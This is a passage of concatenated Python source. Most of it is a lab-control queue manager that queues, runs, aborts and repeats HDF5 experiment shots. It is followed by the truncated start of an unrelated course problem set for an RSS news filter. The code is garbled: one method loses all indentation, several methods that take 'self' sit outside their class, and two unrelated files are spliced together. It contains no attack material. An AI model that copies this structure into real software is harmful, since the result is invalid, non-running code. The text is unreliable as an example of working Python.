        self.action_repeat_all = QAction(QIcon(self.ICON_REPEAT), 'Repeat all', self._ui)
        self.action_repeat_last = QAction(QIcon(self.ICON_REPEAT_LAST), 'Repeat last', self._ui)
        self.action_repeat_all.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_ALL))
        self.action_repeat_last.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_LAST))
        self.repeat_mode_menu.addAction(self.action_repeat_all)
        self.repeat_mode_menu.addAction(self.action_repeat_last)
        self._ui.repeat_mode_select_button.setMenu(self.repeat_mode_menu)
        # The button already has an arrow indicating a menu, don't draw another one:
        self._ui.repeat_mode_select_button.setStyleSheet("QToolButton::menu-indicator{width: 0;}")
        # Daemon thread consuming the queue; manage() is defined further
        # down in this class (not visible in this chunk)
        self.manager = threading.Thread(target = self.manage)
        self.manager.daemon=True
        self.manager.start()
    def _create_headers(self):
        """(Re)create the single 'Filepath' column header of the queue model."""
        self._model.setHorizontalHeaderItem(FILEPATH_COLUMN, QStandardItem('Filepath'))
def get_save_data(self):
# get list of files in the queue
file_list = []
for i in range(self._model.rowCount()):
file_list.append(self._model.item(i).text())
# get button states
return {'manager_paused':self.manager_paused,
'manager_repeat':self.manager_repeat,
'manager_repeat_mode':self.manager_repeat_mode,
'files_queued':file_list,
'last_opened_shots_folder': self.last_opened_shots_folder
}
    def restore_save_data(self,data):
        """Restore queue state previously produced by get_save_data().

        Each key is optional, so partial/legacy save data is accepted.
        """
        if 'manager_paused' in data:
            self.manager_paused = data['manager_paused']
        if 'manager_repeat' in data:
            self.manager_repeat = data['manager_repeat']
        if 'manager_repeat_mode' in data:
            self.manager_repeat_mode = data['manager_repeat_mode']
        if 'files_queued' in data:
            # Rebuild the model from scratch, re-validating each file
            file_list = list(data['files_queued'])
            self._model.clear()
            self._create_headers()
            for file in file_list:
                self.process_request(str(file))
        if 'last_opened_shots_folder' in data:
            self.last_opened_shots_folder = data['last_opened_shots_folder']
    # Whether the manage() thread should keep running (main-thread access
    # enforced by inmain_decorator for Qt safety)
    @property
    @inmain_decorator(True)
    def manager_running(self):
        return self._manager_running
    @manager_running.setter
    @inmain_decorator(True)
    def manager_running(self,value):
        value = bool(value)
        self._manager_running = value
    def _toggle_pause(self,checked):
        """Slot for the pause button: mirror its checked state into the flag."""
        self.manager_paused = checked
    def _toggle_clear(self):
        """Slot for the clear button: empty the queue (headers recreated)."""
        self._model.clear()
        self._create_headers()
    # Whether the queue is paused; setter also syncs the UI button state
    @property
    @inmain_decorator(True)
    def manager_paused(self):
        return self._manager_paused
    @manager_paused.setter
    @inmain_decorator(True)
    def manager_paused(self,value):
        value = bool(value)
        self._manager_paused = value
        # Keep the pause button consistent when set programmatically
        if value != self._ui.queue_pause_button.isChecked():
            self._ui.queue_pause_button.setChecked(value)
    def _toggle_repeat(self,checked):
        """Slot for the repeat button: mirror its checked state into the flag."""
        self.manager_repeat = checked
    # Whether completed shots should be re-queued; setter syncs the button
    @property
    @inmain_decorator(True)
    def manager_repeat(self):
        return self._manager_repeat
    @manager_repeat.setter
    @inmain_decorator(True)
    def manager_repeat(self,value):
        value = bool(value)
        self._manager_repeat = value
        if value != self._ui.queue_repeat_button.isChecked():
            self._ui.queue_repeat_button.setChecked(value)
    # Repeat mode: REPEAT_ALL or REPEAT_LAST; setter updates the button icon
    @property
    @inmain_decorator(True)
    def manager_repeat_mode(self):
        return self._manager_repeat_mode
    @manager_repeat_mode.setter
    @inmain_decorator(True)
    def manager_repeat_mode(self, value):
        assert value in [self.REPEAT_LAST, self.REPEAT_ALL]
        self._manager_repeat_mode = value
        button = self._ui.queue_repeat_button
        if value == self.REPEAT_ALL:
            button.setIcon(QIcon(self.ICON_REPEAT))
        elif value == self.REPEAT_LAST:
            button.setIcon(QIcon(self.ICON_REPEAT_LAST))
    def on_add_shots_triggered(self):
        """Open a file dialog and queue the selected .h5 shot files."""
        shot_files = QFileDialog.getOpenFileNames(self._ui, 'Select shot files',
                                                  self.last_opened_shots_folder,
                                                  "HDF5 files (*.h5)")
        # Qt5 returns (files, selected_filter); Qt4 returns just the list
        if isinstance(shot_files, tuple):
            shot_files, _ = shot_files
        if not shot_files:
            # User cancelled selection
            return
        # Convert to standard platform specific path, otherwise Qt likes forward slashes:
        shot_files = [os.path.abspath(str(shot_file)) for shot_file in shot_files]
        # Save the containing folder for use next time we open the dialog box:
        self.last_opened_shots_folder = os.path.dirname(shot_files[0])
        # Queue the files to be opened:
        for filepath in shot_files:
            if filepath.endswith('.h5'):
                self.process_request(str(filepath))
    def _delete_selected_items(self):
        """Remove all currently selected rows from the queue."""
        index_list = self._ui.treeview.selectedIndexes()
        # Removing a row invalidates the remaining indices, so re-query
        # the selection after each removal until nothing is selected.
        while index_list:
            self._model.takeRow(index_list[0].row())
            index_list = self._ui.treeview.selectedIndexes()
    def _move_up(self):
        """Move each selected row up by one, preserving relative order."""
        # Get the selection model from the treeview
        selection_model = self._ui.treeview.selectionModel()
        # Create a list of select row indices
        selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
        # For each row selected
        for i,row in enumerate(selected_row_list):
            # only move the row if it is not element 0, and the row above it is not selected
            # (note that while a row above may have been initially selected, it should by now, be one row higher
            # since we start moving elements of the list upwards starting from the lowest index)
            if row > 0 and (row-1) not in selected_row_list:
                # Remove the selected row
                items = self._model.takeRow(row)
                # Add the selected row into a position one above
                self._model.insertRow(row-1,items)
                # Since it is now a newly inserted row, select it again
                selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
                # reupdate the list of selected indices to reflect this change
                selected_row_list[i] -= 1
    def _move_down(self):
        """Move each selected row down by one, preserving relative order."""
        # Get the selection model from the treeview
        selection_model = self._ui.treeview.selectionModel()
        # Create a list of select row indices (bottom-up for downward moves)
        selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
        # For each row selected
        for i,row in enumerate(selected_row_list):
            # only move the row if it is not the last element, and the row above it is not selected
            # (note that while a row below may have been initially selected, it should by now, be one row lower
            # since we start moving elements of the list upwards starting from the highest index)
            if row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
                # Remove the selected row
                items = self._model.takeRow(row)
                # Add the selected row into a position one above
                self._model.insertRow(row+1,items)
                # Since it is now a newly inserted row, select it again
                selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
                # reupdate the list of selected indices to reflect this change
                selected_row_list[i] += 1
    def _move_top(self):
        """Move the selected rows to the top of the queue, preserving order."""
        # Get the selection model from the treeview
        selection_model = self._ui.treeview.selectionModel()
        # Create a list of select row indices
        selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
        # For each row selected
        for i,row in enumerate(selected_row_list):
            # only move the row while it is not element 0, and the row above it is not selected
            # (note that while a row above may have been initially selected, it should by now, be one row higher
            # since we start moving elements of the list upwards starting from the lowest index)
            while row > 0 and (row-1) not in selected_row_list:
                # Remove the selected row
                items = self._model.takeRow(row)
                # Add the selected row into a position one above
                self._model.insertRow(row-1,items)
                # Since it is now a newly inserted row, select it again
                selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
                # reupdate the list of selected indices to reflect this change
                selected_row_list[i] -= 1
                row -= 1
    def _move_bottom(self):
        """Move the selected rows to the bottom of the queue, preserving order."""
        selection_model = self._ui.treeview.selectionModel()
        # Create a list of select row indices (bottom-up for downward moves)
        selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
        # For each row selected
        for i,row in enumerate(selected_row_list):
            # only move the row while it is not the last element, and the row above it is not selected
            # (note that while a row below may have been initially selected, it should by now, be one row lower
            # since we start moving elements of the list upwards starting from the highest index)
            while row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
                # Remove the selected row
                items = self._model.takeRow(row)
                # Add the selected row into a position one above
                self._model.insertRow(row+1,items)
                # Since it is now a newly inserted row, select it again
                selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
                # reupdate the list of selected indices to reflect this change
                selected_row_list[i] += 1
                row += 1
    @inmain_decorator(True)
    def append(self, h5files):
        """Append the given shot filepaths to the end of the queue.

        NOTE(review): unlike prepend(), no duplicate check is performed here
        -- callers (e.g. process_request) are expected to have done it.
        """
        for file in h5files:
            item = QStandardItem(file)
            item.setToolTip(file)
            self._model.appendRow(item)
    @inmain_decorator(True)
    def prepend(self,h5file):
        """Insert a shot at the front of the queue, unless already queued."""
        if not self.is_in_queue(h5file):
            self._model.insertRow(0,QStandardItem(h5file))
    def process_request(self,h5_filepath):
        """Validate a shot file against the connection table and queue it.

        If the file has already been run (contains a 'data' group) or is
        already queued, a fresh '_repNNNNN' copy is created and queued
        instead. Returns a human-readable status message.
        """
        # check connection table
        try:
            new_conn = ConnectionTable(h5_filepath, logging_prefix='BLACS')
        except Exception:
            return "H5 file not accessible to Control PC\n"
        result,error = inmain(self.BLACS.connection_table.compare_to,new_conn)
        if result:
            # Has this run file been run already?
            with h5py.File(h5_filepath) as h5_file:
                if 'data' in h5_file['/']:
                    rerun = True
                else:
                    rerun = False
            if rerun or self.is_in_queue(h5_filepath):
                self._logger.debug('Run file has already been run! Creating a fresh copy to rerun')
                new_h5_filepath, repeat_number = self.new_rep_name(h5_filepath)
                # Keep counting up until we get a filename that isn't in the filesystem:
                while os.path.exists(new_h5_filepath):
                    new_h5_filepath, repeat_number = self.new_rep_name(new_h5_filepath)
                success = self.clean_h5_file(h5_filepath, new_h5_filepath, repeat_number=repeat_number)
                if not success:
                    return 'Cannot create a re run of this experiment. Is it a valid run file?'
                self.append([new_h5_filepath])
                message = "Experiment added successfully: experiment to be re-run\n"
            else:
                self.append([h5_filepath])
                message = "Experiment added successfully\n"
            if self.manager_paused:
                message += "Warning: Queue is currently paused\n"
            if not self.manager_running:
                message = "Error: Queue is not running\n"
            return message
        else:
            # TODO: Parse and display the contents of "error" in a more human readable format for analysis of what is wrong!
            message = ("Connection table of your file is not a subset of the experimental control apparatus.\n"
                       "You may have:\n"
                       " Submitted your file to the wrong control PC\n"
                       " Added new channels to your h5 file, without rewiring the experiment and updating the control PC\n"
                       " Renamed a channel at the top of your script\n"
                       " Submitted an old file, and the experiment has since been rewired\n"
                       "\n"
                       "Please verify your experiment script matches the current experiment configuration, and try again\n"
                       "The error was %s\n"%error)
            return message
def new_rep_name(self, h5_filepath):
    """Return (new_filepath, repeat_number) for a repeat of *h5_filepath*.

    'exp.h5'            -> ('exp_rep00001.h5', 1)
    'exp_rep00001.h5'   -> ('exp_rep00002.h5', 2)

    Bug fix: the old code rebuilt the stem with ''.join(split('_rep')[:-1]),
    which destroyed any earlier '_rep' occurrences in the name
    (e.g. 'a_rep4_rep00005' became 'a4_...'). rsplit on the final '_rep'
    preserves the rest of the name.
    """
    basename, ext = os.path.splitext(h5_filepath)
    if '_rep' in basename and ext == '.h5':
        stem, reps = basename.rsplit('_rep', 1)
        try:
            reps = int(reps)
        except ValueError:
            # The suffix after '_rep' wasn't a number, so this isn't a
            # repeat file after all; fall through to rep 1.
            pass
        else:
            return stem + '_rep%05d.h5' % (reps + 1), reps + 1
    return basename + '_rep%05d.h5' % 1, 1
def clean_h5_file(self, h5file, new_h5_file, repeat_number=0):
    """Copy the pre-run content of *h5file* into *new_h5_file*.

    Only the groups written at compile time are copied (any acquired
    data is left behind), all root attributes are carried over, and the
    'run repeat' attribute is set to *repeat_number*.

    Returns True on success; logs the traceback and returns False on
    any failure (e.g. *h5file* is not a valid run file).
    """
    groups_to_copy = ['devices', 'calibrations', 'script', 'globals',
                      'connection table', 'labscriptlib', 'waits',
                      'time_markers']
    try:
        with h5py.File(h5file, 'r') as source, h5py.File(new_h5_file, 'w') as target:
            for group in groups_to_copy:
                if group in source:
                    target.copy(source[group], group)
            for attr_name in source.attrs:
                target.attrs[attr_name] = source.attrs[attr_name]
            target.attrs['run repeat'] = repeat_number
    except Exception:
        self._logger.exception('Clean H5 File Error.')
        return False
    return True
@inmain_decorator(wait_for_return=True)
def is_in_queue(self, path):
    """Return True if *path* is currently listed in the queue model.

    Runs in the main (GUI) thread via inmain_decorator.
    """
    matches = self._model.findItems(path, column=FILEPATH_COLUMN)
    return bool(matches)
@inmain_decorator(wait_for_return=True)
def set_status(self, queue_status, shot_filepath=None):
    """Update the queue-status label, and the running-shot label.

    When *shot_filepath* is given, the running-shot label shows its
    basename in bold; otherwise that label is cleared.
    """
    self._ui.queue_status.setText(str(queue_status))
    if shot_filepath is None:
        shot_markup = ''
    else:
        shot_markup = '<b>%s</b>' % str(os.path.basename(shot_filepath))
    self._ui.running_shot_name.setText(shot_markup)
@inmain_decorator(wait_for_return=True)
def get_status(self):
    """Return the queue-status label's current text (runs in the GUI thread)."""
    return self._ui.queue_status.text()
@inmain_decorator(wait_for_return=True)
def get_next_file(self):
    """Pop and return the filepath at the top of the queue.

    Raises if the queue is empty (takeRow(0) returns an empty list) --
    the caller treats that as 'no work to do'.
    """
    top_row = self._model.takeRow(0)
    return str(top_row[0].text())
@inmain_decorator(wait_for_return=True)
def transition_device_to_buffered(self, name, transition_list, h5file, restart_receiver):
    """Ask device tab *name* to program itself for the shot in *h5file*.

    Refuses (returns False) if the tab is already in an error state.
    Otherwise connects *restart_receiver*, starts the (asynchronous)
    transition to buffered mode, records the tab in *transition_list*
    and returns True. Completion is reported via self.current_queue.
    """
    device_tab = self.BLACS.tablist[name]
    if self.get_device_error_state(name, self.BLACS.tablist):
        return False
    device_tab.connect_restart_receiver(restart_receiver)
    device_tab.transition_to_buffered(h5file, self.current_queue)
    transition_list[name] = device_tab
    return True
@inmain_decorator(wait_for_return=True)
def get_device_error_state(self,name,device_list):
    """Return device *name*'s error message (falsy when there is no error)."""
    return device_list[name].error_message
def manage(self):
    """Queue-manager main loop (runs in its own thread).

    Repeatedly pops the next shot file off the queue, transitions all
    devices to buffered mode, runs the shot, saves front-panel/result
    data, transitions devices back to manual, submits the shot for
    analysis, and optionally re-queues it for repeats. Any error pauses
    the queue and puts the (cleaned) shot file back on top.

    Bug fixes in this revision:
      * stop_order was read from the 'start_order' device property;
      * current_queue.get(2) blocked forever (2 was the 'block' arg,
        not a timeout), so the transition-to-manual error poll was dead;
      * a misspelled 'repeat_numer' left repeat_number undefined on the
        h5-reopen failure path;
      * the repeat-submission failure path referenced self.logger (which
        doesn't exist here), interpolated a stray '%s', and logged
        'message' even after process_request raised (NameError).
    """
    logger = logging.getLogger('BLACS.queue_manager.thread')
    process_tree.zlock_client.set_thread_name('queue_manager')
    # While the program is running!
    logger.info('starting')

    # HDF5 prints lots of errors by default, for things that aren't
    # actually errors. These are silenced on a per thread basis,
    # and automatically silenced in the main thread when h5py is
    # imported. So we'll silence them in this thread too:
    h5py._errors.silence_errors()

    # This name stores the queue currently being used to
    # communicate with tabs, so that abort signals can be put
    # to it when those tabs never respond and are restarted by
    # the user.
    self.current_queue = queue.Queue()

    # TODO: put in general configuration
    timeout_limit = 300  # seconds
    self.set_status("Idle")

    while self.manager_running:
        # If the pause button is pushed in, sleep
        if self.manager_paused:
            if self.get_status() == "Idle":
                logger.info('Paused')
                self.set_status("Queue paused")
            time.sleep(1)
            continue

        # Get the top file
        try:
            path = self.get_next_file()
            self.set_status('Preparing shot...', path)
            logger.info('Got a file: %s' % path)
        except Exception:
            # If no files, sleep for 1s,
            self.set_status("Idle")
            time.sleep(1)
            continue

        devices_in_use = {}
        transition_list = {}
        start_time = time.time()
        self.current_queue = queue.Queue()

        # Function to be run when abort button is clicked
        def abort_function():
            try:
                # Set device name to "Queue Manager" which will never be a labscript device name
                # as it is not a valid python variable name (has a space in it!)
                self.current_queue.put(['Queue Manager', 'abort'])
            except Exception:
                logger.exception('Could not send abort message to the queue manager')

        def restart_function(device_name):
            try:
                self.current_queue.put([device_name, 'restart'])
            except Exception:
                logger.exception('Could not send restart message to the queue manager for device %s' % device_name)

        ######################################################################
        # transition to buffered                                             #
        ######################################################################
        try:
            # A Queue for event-based notification when the tabs have
            # completed transitioning to buffered:
            timed_out = False
            error_condition = False
            abort = False
            restarted = False
            self.set_status("Transitioning to buffered...", path)

            # Enable abort button, and link in current_queue:
            inmain(self._ui.queue_abort_button.clicked.connect, abort_function)
            inmain(self._ui.queue_abort_button.setEnabled, True)

            with h5py.File(path, 'r') as hdf5_file:
                devices_in_use = {}
                start_order = {}
                stop_order = {}
                for name in hdf5_file['devices']:
                    device_properties = labscript_utils.properties.get(
                        hdf5_file, name, 'device_properties'
                    )
                    devices_in_use[name] = self.BLACS.tablist[name]
                    start_order[name] = device_properties.get('start_order', None)
                    # Bug fix: this previously read 'start_order' again,
                    # silently ignoring any custom stop order.
                    stop_order[name] = device_properties.get('stop_order', None)

            # Sort the devices into groups based on their start_order and stop_order
            start_groups = defaultdict(set)
            stop_groups = defaultdict(set)
            for name in devices_in_use:
                start_groups[start_order[name]].add(name)
                stop_groups[stop_order[name]].add(name)

            while (transition_list or start_groups) and not error_condition:
                if not transition_list:
                    # Ready to transition the next group:
                    for name in start_groups.pop(min(start_groups)):
                        try:
                            # Connect restart signal from tabs to current_queue and transition the device to buffered mode
                            success = self.transition_device_to_buffered(name, transition_list, path, restart_function)
                            if not success:
                                logger.error('%s has an error condition, aborting run' % name)
                                error_condition = True
                                break
                        except Exception:
                            logger.exception('Exception while transitioning %s to buffered mode.' % (name))
                            error_condition = True
                            break
                    if error_condition:
                        break
                try:
                    # Wait for a device to transtition_to_buffered:
                    logger.debug('Waiting for the following devices to finish transitioning to buffered mode: %s' % str(transition_list))
                    device_name, result = self.current_queue.get(timeout=2)

                    # Handle abort button signal
                    if device_name == 'Queue Manager' and result == 'abort':
                        # we should abort the run
                        logger.info('abort signal received from GUI')
                        abort = True
                        break

                    if result == 'fail':
                        logger.info('abort signal received during transition to buffered of %s' % device_name)
                        error_condition = True
                        break
                    elif result == 'restart':
                        logger.info('Device %s was restarted, aborting shot.' % device_name)
                        restarted = True
                        break

                    logger.debug('%s finished transitioning to buffered mode' % device_name)
                    # The tab says it's done, but does it have an error condition?
                    if self.get_device_error_state(device_name, transition_list):
                        logger.error('%s has an error condition, aborting run' % device_name)
                        error_condition = True
                        break
                    del transition_list[device_name]
                except queue.Empty:
                    # It's been 2 seconds without a device finishing
                    # transitioning to buffered. Is there an error?
                    for name in transition_list:
                        if self.get_device_error_state(name, transition_list):
                            error_condition = True
                            break
                    if error_condition:
                        break
                    # Has programming timed out?
                    if time.time() - start_time > timeout_limit:
                        logger.error('Transitioning to buffered mode timed out')
                        timed_out = True
                        break

            # Handle if we broke out of loop due to timeout or error:
            if timed_out or error_condition or abort or restarted:
                # Pause the queue, re add the path to the top of the queue, and set a status message!
                # only if we aren't responding to an abort click
                if not abort:
                    self.manager_paused = True
                    self.prepend(path)
                if timed_out:
                    self.set_status("Programming timed out\nQueue paused")
                elif abort:
                    self.set_status("Aborted")
                elif restarted:
                    self.set_status("Device restarted in transition to\nbuffered. Aborted. Queue paused.")
                else:
                    self.set_status("Device(s) in error state\nQueue Paused")

                # Abort the run for all devices in use:
                # need to recreate the queue here because we don't want to hear from devices that are still transitioning to buffered mode
                self.current_queue = queue.Queue()
                for tab in devices_in_use.values():
                    # We call abort buffered here, because if each tab is either in mode=BUFFERED or transition_to_buffered failed in which case
                    # it should have called abort_transition_to_buffered itself and returned to manual mode
                    # Since abort buffered will only run in mode=BUFFERED, and the state is not queued indefinitely (aka it is deleted if we are not in mode=BUFFERED)
                    # this is the correct method call to make for either case
                    tab.abort_buffered(self.current_queue)
                    # We don't need to check the results of this function call because it will either be successful, or raise a visible error in the tab.
                    # disconnect restart signal from tabs
                    inmain(tab.disconnect_restart_receiver, restart_function)

                # disconnect abort button and disable
                inmain(self._ui.queue_abort_button.clicked.disconnect, abort_function)
                inmain(self._ui.queue_abort_button.setEnabled, False)

                # Start a new iteration
                continue

            ##################################################################
            # SCIENCE!                                                       #
            ##################################################################

            # Get front panel data, but don't save it to the h5 file until the experiment ends:
            states, tab_positions, window_data, plugin_data = self.BLACS.front_panel_settings.get_save_data()
            self.set_status("Running (program time: %.3fs)..." % (time.time() - start_time), path)

            # A Queue for event-based notification of when the experiment has finished.
            experiment_finished_queue = queue.Queue()
            logger.debug('About to start the master pseudoclock')
            run_time = time.localtime()

            ##################################################################
            # Plugin callbacks                                               #
            ##################################################################
            for callback in plugins.get_callbacks('science_starting'):
                try:
                    callback(path)
                except Exception:
                    logger.exception("Plugin callback raised an exception")

            # TODO: fix potential race condition if BLACS is closing when this line executes?
            self.BLACS.tablist[self.master_pseudoclock].start_run(experiment_finished_queue)

            # Wait for notification of the end of run:
            abort = False
            restarted = False
            done = False
            while not (abort or restarted or done):
                try:
                    done = experiment_finished_queue.get(timeout=0.5) == 'done'
                except queue.Empty:
                    pass
                try:
                    # Poll self.current_queue for abort signal from button or device restart
                    device_name, result = self.current_queue.get_nowait()
                    if (device_name == 'Queue Manager' and result == 'abort'):
                        abort = True
                    if result == 'restart':
                        restarted = True
                    # Check for error states in tabs
                    for device_name, tab in devices_in_use.items():
                        if self.get_device_error_state(device_name, devices_in_use):
                            restarted = True
                except queue.Empty:
                    pass

            if abort or restarted:
                for devicename, tab in devices_in_use.items():
                    if tab.mode == MODE_BUFFERED:
                        tab.abort_buffered(self.current_queue)
                    # disconnect restart signal from tabs
                    inmain(tab.disconnect_restart_receiver, restart_function)

            # Disable abort button
            inmain(self._ui.queue_abort_button.clicked.disconnect, abort_function)
            inmain(self._ui.queue_abort_button.setEnabled, False)

            if restarted:
                self.manager_paused = True
                self.prepend(path)
                self.set_status("Device restarted during run.\nAborted. Queue paused")
            elif abort:
                self.set_status("Aborted")

            if abort or restarted:
                # after disabling the abort button, we now start a new iteration
                continue

            logger.info('Run complete')
            self.set_status("Saving data...", path)
        # End try/except block here
        except Exception:
            logger.exception("Error in queue manager execution. Queue paused.")
            # Raise the error in a thread for visibility
            zprocess.raise_exception_in_thread(sys.exc_info())
            # clean up the h5 file
            self.manager_paused = True
            # is this a repeat?
            try:
                with h5py.File(path, 'r') as h5_file:
                    repeat_number = h5_file.attrs.get('run repeat', 0)
            except Exception:
                # Bug fix: previously assigned to a misspelled
                # 'repeat_numer', leaving repeat_number undefined below.
                repeat_number = 0
            # clean the h5 file:
            self.clean_h5_file(path, 'temp.h5', repeat_number=repeat_number)
            try:
                shutil.move('temp.h5', path)
            except Exception:
                msg = ('Couldn\'t delete failed run file %s, ' % path +
                       'another process may be using it. Using alternate '
                       'filename for second attempt.')
                logger.warning(msg, exc_info=True)
                shutil.move('temp.h5', path.replace('.h5', '_retry.h5'))
                path = path.replace('.h5', '_retry.h5')
            # Put it back at the start of the queue:
            self.prepend(path)

            # Need to put devices back in manual mode
            self.current_queue = queue.Queue()
            for devicename, tab in devices_in_use.items():
                if tab.mode == MODE_BUFFERED or tab.mode == MODE_TRANSITION_TO_BUFFERED:
                    tab.abort_buffered(self.current_queue)
                # disconnect restart signal from tabs
                inmain(tab.disconnect_restart_receiver, restart_function)
            self.set_status("Error in queue manager\nQueue paused")

            # disconnect and disable abort button
            inmain(self._ui.queue_abort_button.clicked.disconnect, abort_function)
            inmain(self._ui.queue_abort_button.setEnabled, False)

            # Start a new iteration (the finally clause below still runs first)
            continue

            ##################################################################
            # SCIENCE OVER!                                                  #
            ##################################################################
        finally:
            ##################################################################
            # Plugin callbacks                                               #
            ##################################################################
            for callback in plugins.get_callbacks('science_over'):
                try:
                    callback(path)
                except Exception:
                    logger.exception("Plugin callback raised an exception")

        ######################################################################
        # Transition to manual                                               #
        ######################################################################
        # start new try/except block here
        try:
            with h5py.File(path, 'r+') as hdf5_file:
                self.BLACS.front_panel_settings.store_front_panel_in_h5(hdf5_file, states, tab_positions, window_data, plugin_data, save_conn_table=False, save_queue_data=False)
                data_group = hdf5_file['/'].create_group('data')
                # stamp with the run time of the experiment
                hdf5_file.attrs['run time'] = time.strftime('%Y%m%dT%H%M%S', run_time)

            error_condition = False
            response_list = {}
            # Keep transitioning tabs to manual mode and waiting on them until they
            # are all done or have all errored/restarted/failed. If one fails, we
            # still have to transition the rest to manual mode:
            while stop_groups:
                transition_list = {}
                # Transition the next group to manual mode:
                for name in stop_groups.pop(min(stop_groups)):
                    tab = devices_in_use[name]
                    try:
                        tab.transition_to_manual(self.current_queue)
                        transition_list[name] = tab
                    except Exception:
                        logger.exception('Exception while transitioning %s to manual mode.' % (name))
                        error_condition = True
                # Wait for their responses:
                while transition_list:
                    logger.info('Waiting for the following devices to finish transitioning to manual mode: %s' % str(transition_list))
                    try:
                        # Bug fix: was current_queue.get(2), which passes 2 as
                        # the 'block' argument and waits forever; the intended
                        # behaviour is a two second timeout.
                        name, result = self.current_queue.get(timeout=2)
                        if name == 'Queue Manager' and result == 'abort':
                            # Ignore any abort signals left in the queue, it is too
                            # late to abort in any case:
                            continue
                    except queue.Empty:
                        # 2 seconds without a device transitioning to manual mode.
                        # Is there an error:
                        for name in transition_list.copy():
                            if self.get_device_error_state(name, transition_list):
                                error_condition = True
                                logger.debug('%s is in an error state' % name)
                                del transition_list[name]
                        continue
                    response_list[name] = result
                    if result == 'fail':
                        error_condition = True
                        logger.debug('%s failed to transition to manual' % name)
                    elif result == 'restart':
                        error_condition = True
                        logger.debug('%s restarted during transition to manual' % name)
                    elif self.get_device_error_state(name, devices_in_use):
                        error_condition = True
                        logger.debug('%s is in an error state' % name)
                    else:
                        logger.debug('%s finished transitioning to manual mode' % name)
                    # Once device has transitioned_to_manual, disconnect restart
                    # signal:
                    tab = devices_in_use[name]
                    inmain(tab.disconnect_restart_receiver, restart_function)
                    del transition_list[name]
            if error_condition:
                self.set_status("Error in transtion to manual\nQueue Paused")
        except Exception:
            error_condition = True
            logger.exception("Error in queue manager execution. Queue paused.")
            self.set_status("Error in queue manager\nQueue paused")
            # Raise the error in a thread for visibility
            zprocess.raise_exception_in_thread(sys.exc_info())

        if error_condition:
            # clean up the h5 file
            self.manager_paused = True
            # is this a repeat?
            try:
                with h5py.File(path, 'r') as h5_file:
                    repeat_number = h5_file.attrs.get('run repeat', 0)
            except Exception:
                repeat_number = 0
            # clean the h5 file:
            self.clean_h5_file(path, 'temp.h5', repeat_number=repeat_number)
            try:
                shutil.move('temp.h5', path)
            except Exception:
                msg = ('Couldn\'t delete failed run file %s, ' % path +
                       'another process may be using it. Using alternate '
                       'filename for second attempt.')
                logger.warning(msg, exc_info=True)
                shutil.move('temp.h5', path.replace('.h5', '_retry.h5'))
                path = path.replace('.h5', '_retry.h5')
            # Put it back at the start of the queue:
            self.prepend(path)
            continue

        ######################################################################
        # Analysis Submission                                                #
        ######################################################################
        logger.info('All devices are back in static mode.')

        # check for analysis Filters in Plugins
        send_to_analysis = True
        for callback in plugins.get_callbacks('analysis_cancel_send'):
            try:
                if callback(path):
                    send_to_analysis = False
                    break
            except Exception:
                logger.exception("Plugin callback raised an exception")

        # Submit to the analysis server
        if send_to_analysis:
            self.BLACS.analysis_submission.get_queue().put(['file', path])

        ######################################################################
        # Plugin callbacks                                                   #
        ######################################################################
        for callback in plugins.get_callbacks('shot_complete'):
            try:
                callback(path)
            except Exception:
                logger.exception("Plugin callback raised an exception")

        ######################################################################
        # Repeat Experiment?                                                 #
        ######################################################################
        # check for repeat Filters in Plugins
        repeat_shot = self.manager_repeat
        for callback in plugins.get_callbacks('shot_ignore_repeat'):
            try:
                if callback(path):
                    repeat_shot = False
                    break
            except Exception:
                logger.exception("Plugin callback raised an exception")

        if repeat_shot:
            if ((self.manager_repeat_mode == self.REPEAT_ALL) or
                    (self.manager_repeat_mode == self.REPEAT_LAST and inmain(self._model.rowCount) == 0)):
                # Resubmit job to the bottom of the queue:
                try:
                    message = self.process_request(path)
                except Exception:
                    # TODO: make this error popup for the user
                    # Bug fixes: use the local 'logger' (self.logger does not
                    # exist) and interpolate the path into the message.
                    logger.exception('Failed to copy h5_file (%s) for repeat run' % path)
                else:
                    # Bug fix: only log the message on success; previously it
                    # was referenced even after an exception (NameError).
                    logger.info(message)

        self.set_status("Idle")
    logger.info('Stopping')
|
ps5.py | # 6.0001/6.00 Problem Set 5 - RSS Feed Filter
# Name:
# Collaborators:
# Time:
import feedparser
import string
import time
import threading
from project_util import translate_html
from mtTkinter import *
from datetime import datetime
import pytz
#-----------------------------------------------------------------------
#======================
# Code for retrieving and parsing
# Google and Yahoo News feeds
# Do not change this code
#======================
def process(url):
    """
    Fetches news items from the rss url and parses them.
    Returns a list of NewsStory-s.
    """
    feed = feedparser.parse(url)
    entries = feed.entries
    ret = []
    for entry in entries:
        guid = entry.guid
        title = translate_html(entry.title)
        link = entry.link
        description = translate_html(entry.description)
        pubdate = translate_html(entry.published)
        try:
            pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %Z")
            # Bug fix: datetime.replace returns a new object; the original
            # discarded the result, leaving pubdate naive. Assign it so the
            # GMT timezone actually sticks.
            pubdate = pubdate.replace(tzinfo=pytz.timezone("GMT"))
            # pubdate = pubdate.astimezone(pytz.timezone('EST'))
            # pubdate.replace(tzinfo=None)
        except ValueError:
            pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %z")
        newsStory = NewsStory(guid, title, description, link, pubdate)
        ret.append(newsStory)
    return ret
#======================
# Data structure design
#======================
# Problem 1
# TODO: NewsStory
class NewsStory(object):
    """One parsed RSS news item: identity, display fields and publish time."""

    def __init__(self, guid, title, description, link, pubdate):
        """Store the item's fields; all are kept exactly as given."""
        self.guid, self.title = guid, title
        self.description, self.link = description, link
        self.pubdate = pubdate

    def get_guid(self):
        """Return the globally unique identifier string."""
        return self.guid

    def get_title(self):
        """Return the headline text."""
        return self.title

    def get_description(self):
        """Return the story summary/description text."""
        return self.description

    def get_link(self):
